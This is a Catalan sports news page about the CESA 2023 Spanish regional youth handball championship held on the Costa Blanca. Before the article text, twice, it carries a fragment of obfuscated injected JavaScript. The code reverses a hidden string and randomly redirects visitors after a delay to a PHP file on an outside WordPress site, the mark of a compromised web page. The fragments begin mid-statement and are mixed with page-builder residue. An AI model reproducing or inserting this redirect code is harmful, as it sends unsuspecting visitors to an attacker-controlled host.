) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}top_left” background_repeat=”repeat”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}top_left” background_repeat=”repeat”]

Més de 2.500 esportistes se citen des de dimarts fins diumenge a la Costa Blanca, on té lloc la nova edició del Campionat d’Espanya de Seleccions Autonòmiques. Totes les trobades es podran seguir en directe per streaming.

El litoral alacantí està llest per acollir la gran festa de l’handbol base al nostre país. Des del 3 al 8 de gener, 102 seleccions autonòmiques protagonitzaran una nova i espectacular edició del Campionat d’Espanya de Seleccions Autonòmiques. Seran més de 300 els partits que es disputaran en sis dies frenètics, amb 14 pavellons habilitats per rebre els futurs Hispans i Guerreres.

 

Benidorm, Alacant, Altea, Benissa, Callosa d’en Sarrià, l’Alfàs del Pi, la Nucia, la Vila Joiosa, Mutxamel, Sant Joan d’Alacant i Sant Vicent del Raspeig són les 11 seus on es podrà gaudir del talent de la base espanyola, que té el CESA el seu aparador més gran de cara al futur.

 

És la primera vegada que la Costa Blanca acull aquest esdeveniment des de la unificació de categories que es va produir el 2014, cosa que augmenta l’expectació i les ganes per aquesta nova edició. La Costa Blanca pren així el relleu del Mar Menor, on es va celebrar el CESA de l’any passat en una edició especial que va suposar la tornada de la competició després de dos anys d’aturada a causa del cóvid-19. Ara, el CESA torna a les dates de celebració tradicionals, coincidint amb l’època nadalenca una primera setmana de l’any en què l’handbol torna a ser el gran protagonista.

 

En el pla esportiu, Andalusia i Catalunya són les dues grans seleccions a batre després dels brillants resultats obtinguts a la passada edició. La selecció andalusa va aconseguir imposar-se en tres categories – infantil masculí, cadet i juvenil femení –, mentre que el combinat català va regnar a les categories cadet i juvenil masculí. Per la seva banda, el País Valencià va aconseguir l’or en infantil femení i, ara, intentarà millorar els seus registres i assaltar el medaller fent valer la condició d’amfitrió.

 

Serà una edició del CESA molt especial, coincidint espacialment i temporalment amb la disputa del Torneig Internacional d’Espanya 2023. Els Hispans afronten l’última fase de preparació abans de posar rumb al Campionat del Món de Polònia i Suècia, amb Benidorm exercint de cuir l’equip de Jordi Ribera. Allà es concentrarà la selecció espanyola al llarg de tota aquesta setmana i, entre el 5 i el 7 de gener, tindrà lloc el TIE 2023 amb Romania, Baréin i Argentina com les tres seleccions a batre per als espanyols.

 

Cal destacar, a més, el suport i la col·laboració brindada per les institucions públiques de la Comunitat Valenciana per fer del CESA 2023 una realitat, ressaltant a la Generalitat Valenciana, la Fundació Trinitat Alfonso, Turisme Comunitat Valenciana, la Diputació d’Alacant i el Patronat de Turisme Costa Blanca.

 

GAUDEIX DE TOT EL CESSAMENT 2023 EN DIRECTE

Com una de les grans i més assenyalades cites del calendari esportiu, el Campionat d’Espanya de Seleccions Autonòmiques 2023 es podrà seguir íntegrament en directe. Totes i cadascuna de les trobades s’emetran per streaming a través del canal oficial de YouTube de la Reial Federació Espanyola d’Handbol.

 

Podeu consultar la normativa i el calendari de competició del CESA 2023 als documents adjunts a la dreta d’aquesta pàgina web.

Font d’informació: https://www.rfebm.com/noticia/vuelve-la-gran-fiesta-del-balonmano-base-vuelve-el-cesa

 Aquests són els jugadors seleccionats per participar al CESA Costa Blanca 2023 que representaran les Illes Balears durant la imminent competició.